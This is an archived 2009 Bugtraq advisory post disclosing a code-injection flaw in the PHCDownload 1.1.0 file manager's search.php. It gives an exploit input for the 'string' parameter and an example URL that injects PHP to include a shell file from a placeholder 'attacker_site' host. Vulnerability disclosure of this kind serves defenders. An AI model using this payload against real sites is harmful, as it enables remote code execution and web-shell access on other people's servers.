PHCDownload 1.1.0 Vulnerabilities

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: PHCDownload 1.1.0 Vulnerabilities
From: contact@xxxxxxxxxxx
Date: 20 Feb 2009 17:10:00 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

A file content management and manipulation system unlike any other available on 
the market today, with unique innovations, tools, and design, customising and 
producing your database is made easy.
PHCDownload has been designed for integration into existing websites with its 
highly customisable interface and editable language file system.

Vendor: http://www.phpcredo.com
Version: 1.1.0 and older
Vuls file: seach.php
Descripton: It is like remote file inclusion but you can run PHP code browser 
address. I don't know what is called.

Exploit: http://[site]/[path_to_script]/search.php
Input: ">< <?php PHP code here ?>

Example: http://[site]/[path_to_script]/search.php?string=";>< <?php 
include("http://attacker_site/SHELL_FILE";); ?>

Prev by Date: [ MDVSA-2009:046 ] dia
Next by Date: Re: SEPKILL /im SMC.EXE /f
Previous by thread: [ MDVSA-2009:046 ] dia
Next by thread: [ MDVSA-2009:045 ] php
Index(es):
- Date
- Thread